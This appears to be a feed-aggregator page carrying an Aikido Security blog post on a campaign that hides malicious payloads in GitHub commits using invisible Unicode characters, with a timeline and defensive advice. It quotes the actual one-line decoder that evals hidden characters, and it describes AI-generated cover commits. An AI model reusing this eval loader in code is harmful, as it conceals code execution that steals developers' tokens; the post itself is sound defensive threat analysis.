惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

D
DataBreaches.Net
Apple Machine Learning Research
Apple Machine Learning Research
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
S
SegmentFault 最新的问题
博客园 - 聂微东
罗磊的独立博客
W
WeLiveSecurity
博客园_首页
Scott Helme
Scott Helme
V
Visual Studio Blog
T
The Exploit Database - CXSecurity.com
G
Google Developers Blog
大猫的无限游戏
大猫的无限游戏
Latest news
Latest news
L
Lohrmann on Cybersecurity
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
A
About on SuperTechFans
F
Full Disclosure
Y
Y Combinator Blog
D
Darknet – Hacking Tools, Hacker News & Cyber Security
博客园 - 司徒正美
博客园 - Franky
C
CXSECURITY Database RSS Feed - CXSecurity.com
F
Fortinet All Blogs
Blog — PlanetScale
Blog — PlanetScale
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
阮一峰的网络日志
阮一峰的网络日志
S
Schneier on Security
雷峰网
雷峰网
博客园 - 【当耐特】
P
Privacy International News Feed
C
Cyber Attacks, Cyber Crime and Cyber Security
Engineering at Meta
Engineering at Meta
aimingoo的专栏
aimingoo的专栏
MongoDB | Blog
MongoDB | Blog
J
Java Code Geeks
T
Tor Project blog
V
V2EX
爱范儿
爱范儿
C
Check Point Blog
T
Threatpost
Project Zero
Project Zero
量子位
V
Vulnerabilities – Threatpost
Know Your Adversary
Know Your Adversary
I
Intezer
G
GRAHAM CLULEY
P
Privacy & Cybersecurity Law Blog
GbyAI
GbyAI
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com

Aikido Security's Blog

Axios CVE-2026-40175: a critical bug that’s… not exploitable GlassWorm goes native: New Zig dropper infects every IDE on your machine Aikido Attack finds multiple 0-days in Hoppscotch The cybersecurity doomerism around Mythos doesn't match what we see on the ground axios compromised on npm: maintainer account hijacked, RAT deployed Popular telnyx package compromised on PyPI by TeamPCP Aikido × Lovable: Vibe, Fix, Ship CanisterWorm Gets Teeth: TeamPCP's Kubernetes Wiper Targets Iran TeamPCP deploys CanisterWorm on NPM following Trivy compromise Security testing is validating software that no longer exists Aikido Recognized by Frost & Sullivan with the 2026 Customer Value Leadership Award in ASPM GlassWorm Hides a RAT Inside a Malicious Chrome Extension fast-draft Open VSX Extension Compromised by BlokTrooper Glassworm Strikes Popular React Native Phone Number Packages Glassworm Is Back: A New Wave of Invisible Unicode Attacks Hits Hundreds of Repositories How Security Teams Fight Back Against AI-Powered Hackers Introducing Betterleaks, an open source secrets scanner by the author of Gitleaks Trump’s 2026 cybersecurity strategy: From compliance to consequence How does AI pentesting work with compliance? What continuous pentesting actually requires Rare Not Random: Using Token Efficiency for Secrets Scanning Persistent XSS/RCE using WebSockets in Storybook’s dev server Why Determinism Is Still a Necessity in Security WAF vs. RASP vs. ADR Introducing Aikido Infinite: A new model of self-securing software How Aikido secures AI pentesting agents by design Astro Full-Read SSRF via Host Header Injection How to Get Your Board to Care About Security (Before a Breach Forces the Issue) What is Slopsquatting? The AI Package Hallucination Attack Already Happening SvelteSpill: A Cache Deception Bug in SvelteKit + Vercel Top 6 Wiz Code Alternatives Aikido recognized as Platform Leader in Latio Tech's 2026 Application Security Report From detection to prevention: How Zen stops IDOR vulnerabilities at runtime npm backdoor lets hackers hijack gambling outcomes Introducing Upgrade Impact Analysis: When breaking changes actually matter to your code Why Trying to Secure OpenClaw is Ridiculous Claude Opus 4.6 found 500 vulnerabilities. What does this change for software security? Introducing Aikido Expansion Packs: Safer defaults inside the IDE International AI Safety Report 2026: What It Means for Autonomous AI Systems Self-Securing Software: What It Is, Why It Matters, and How It Works npx Confusion: Packages That Forgot to Claim Their Own Name What Is Continuous Pentesting? Introducing Aikido Package Health: a Better Way to Trust Your Dependencies AI Pentesting: Minimum Safety Requirements for Security Testing Secure SDLC for Engineering Teams (+ Checklist) Fake Clawdbot VS Code Extension Installs ScreenConnect RAT G_Wagon: npm Package Deploys Python Stealer Targeting 100+ Crypto Wallets Gone Phishin': npm Packages Serving Custom Credential Harvesting Pages Malicious PyPI Packages spellcheckpy and spellcheckerpy Deliver Python RAT Top 10 AI Security Tools For 2026 Agent Skills Are Spreading Hallucinated npx Commands Understanding Open-Source License Risk in Modern Software The CISO Vibe Coding Checklist for Security Top 6 Graphite alternatives for AI code review in 2026 From “No Bullsh*t Security” to $1B: We Just Raised Our $60m Series B Critical n8n Vulnerability Allows Unauthenticated Remote Code Execution (CVE-2026-21858) Top 14 VS Code Extensions for 2026 AI-Driven Pentesting of Coolify: Seven CVEs Identified Top Continuous Pentesting Tools in 2026 SAST vs SCA: Securing the Code You Write and the Code You Depend On JavaScript, MSBuild, and the Blockchain: Anatomy of the NeoShadow npm Supply-Chain Attack How Engineering and Security Teams Can Meet DORA’s Technical Requirements IDOR Vulnerabilities Explained: Why They Persist in Modern Applications Shai Hulud strikes again - The golden path MongoBleed: MongoDB Zlib Vulnerability (CVE-2025-14847) and How to Fix It First Sophisticated Malware Discovered on Maven Central via Typosquatting Attack on Jackson The Fork Awakens: Why GitHub’s Invisible Networks Break Package Security Top 10 Cyber Security Tools For 2026 SAST in the IDE is now free: Moving SAST to where development actually happens AI Pentesting in Action: A TL;DV Recap of Our Live Demo The Top 7 Threat Intelligence Tools in 2026 React & Next.js DoS Vulnerability (CVE-2025-55184): What You Need to Fix After React2Shell OWASP Top 10 for Agentic Applications (2026): What Developers and Security Teams Need to Know DAST vs Pentesting v AI Pentesting: Why DAST Cannot Replace Modern Pentesting PromptPwnd: Prompt Injection Vulnerabilities in GitHub Actions Using AI Agents Top 7 Cloud Security Vulnerabilities Critical React & Next.js RCE Vulnerability (CVE-2025-55182): What You Need to Fix Now How to Comply With the UK Cybersecurity & Resilience Bill: A Practical Guide for Modern Engineering Teams Shai Hulud 2.0: What the Unknown Wonderer Tells Us About the Attackers’ Endgame SCA Everywhere: Scan and Fix Open-Source Dependencies in Your IDE Safe Chain now enforces a minimum package age before install Shai Hulud Attacks Persist Through GitHub Actions Vulnerabilities Shai Hulud Launches Second Supply-Chain Attack: Zapier, ENS, AsyncAPI, PostHog, Postman Compromised CORS Security: Beyond Basic Configuration Revolut Selects Aikido Security to Power Developer-First Software Security The Future of Pentesting Is Autonomous How Aikido and Deloitte are bringing developer-first security to enterprise Secrets Detection: A Practical Guide to Finding and Preventing Leaked Credentials Invisible Unicode Malware Strikes OpenVSX, Again AI as a Power Tool: How Windsurf and Devin Are Changing Secure Coding Building Fast, Staying Secure: Supabase’s Approach to Secure-by-Default Development OWASP Top 10 2025: Official List, Changes, and What Developers Need to Know Top 10 JavaScript Security Vulnerabilities in Modern Web Apps Top 7 Black Duck Alternatives in 2026 What Is IaC Security Scanning? Terraform, Kubernetes & Cloud Misconfigurations Explained AutoTriage and the Swiss Cheese Model of Security Noise Reduction Top Software Supply Chain Security Vulnerabilities Explained The Top 7 Kubernetes Security Tools Top 10 Web Application Security Vulnerabilities Every Team Should Know What Is CSPM (and CNAPP)? Cloud Security Posture Management Explained
The Return of the Invisible Threat: Hidden PUA Unicode Hits GitHub repositorties
2025-10-31 · via Aikido Security's Blog

It wasn’t long ago that we uncovered compromised extensions on Open VSX . Now, a new wave of attacks is emerging, and all signs point to the same threat actor.

The technique will sound familiar: hidden malicious code injected with invisible Unicode Private Use Area (PUA) characters. We first saw this trick back in March when npm packages used PUAs to conceal payloads. Then came Open VSX. Now, the attacker seems to have turned their sights on GitHub, and their methods are evolving. The delivery is getting smarter, stealthier, and a lot more deceptive.

Timeline of the Invisible Code Campaign

  • March – Aikido first discovers malicious npm packages hiding payloads using PUA Unicode characters
  • May – We publish a blog detailing the risks of invisible Unicode and how it can be abused in supply chain attacks
  • October 17 – We uncover compromised extensions on Open VSX using the same technique;
  • October 18 - Koi Security analyzes the malware and payload, naming it Glassworm
  • October 31 – We discover that the attackers have shifted focus to GitHub repositories

Stealth by Design

We were first alerted to this new wave when a developer reached out after noticing something strange: several of his own GitHub repositories had been updated, by him, at least according to the commit history. The commits looked legitimate. They contained realistic feature updates, small refactors, and even bug fixes that matched the project’s coding style and commit messages. Apart from one difference, the email of the committer was set to null. But at the end of these commits, each one had a single, identical addition:

const d=s=>[...s].map(c=>(c=c.codePointAt(0),c>=0xFE00&&c<=0xFE0F?c-0xFE00:c>=0xE0100&&c<=0xE01EF?c-0xE0100+16:null)).filter(b=>b!==null);eval(Buffer.from(d(``)).toString('utf-8'));

Can you spot the malware? At first glance it's hard to see what's going on, but what sticks out is the eval call, which is often used to execute code dynamically. Only the input to eval appears empty. However, the empty string passed to d() in eval is not empty at all. It contains invisible Unicode characters, hidden code encoded with Private Use Area symbols, just like in the previous npm and Open VSX incidents.

This time, however, the delivery is far more subtle. Everything has been collapsed into a single line, leaving almost no visual clue. The malicious code is tucked inside what looks like normal project activity, hidden within legitimate commits.

It’s possible that the benign-looking changes were AI-generated to make the commits more convincing. Since these commits were very project-specific, it suggest the attacker may have leveraged large language models to craft realistic, context-aware code changes, effectively using AI to camouflage their payload within ordinary development activity.

The decoded PUA characters lead to a script that appears very similar to the Open VSX samples, which suggests we are likely dealing with the same threat actor. The decoded script appears to use Solana as a delivery channel, fetching and executing a payload from the blockchain. Based on the Open VSX incidents, those payloads have been capable of stealing tokens and other secrets. If credentials or CI tokens are harvested, they could be reused to push the same payload in other repositories, which in turn could enable a worm-like propagation as we've seen with previous attacks.

Signs of a Larger Attack

After identifying the malicious pattern, we started looking to see if the same payload appeared elsewhere. A quick search on GitHub for the pattern quickly revealed other repositories showing the same suspicious line.

In these projects, a new commit had been pushed that looked entirely legitimate at first glance. The commits contained normal changes such as documentation updates, version increases, and small code improvements, but each one also included the same hidden payload appended at the end of a file.

For now, this campaign seems to be limited to JavaScript projects hosted on GitHub. We have not observed any signs of similar compromises in npm or other ecosystems, though we are monitoring it closely since the same attacker may attempt to expand their reach.

Evolving Threats, Smarter Defenses

These incidents highlight the need for better awareness around Unicode misuse, especially the dangers of invisible Private Use Area characters. Developers can only defend against what they can see, and right now most tools are not showing them enough. Neither GitHub’s web interface nor VS Code displayed any sign that something was wrong. In earlier cases, such as the Open VSX attacks, some IDEs did show subtle indicators next to the hidden characters, but those safeguards were missing here.

While this technique is not new, it is clearly evolving. Earlier threats like Shai Hulud simply injected malicious postinstall scripts, making them relatively easy to detect. Now, attackers are blending malicious code with realistic commits and project-specific improvements, possibly aided by AI to make their changes appear natural. It is a sign of where the threat landscape is heading.

At Aikido, we are adapting to that same evolution. We use large language models among other detection systems to spot these increasingly subtle threats. As attackers adopt AI to hide their intent, our defenses need to grow just as intelligent to uncover it.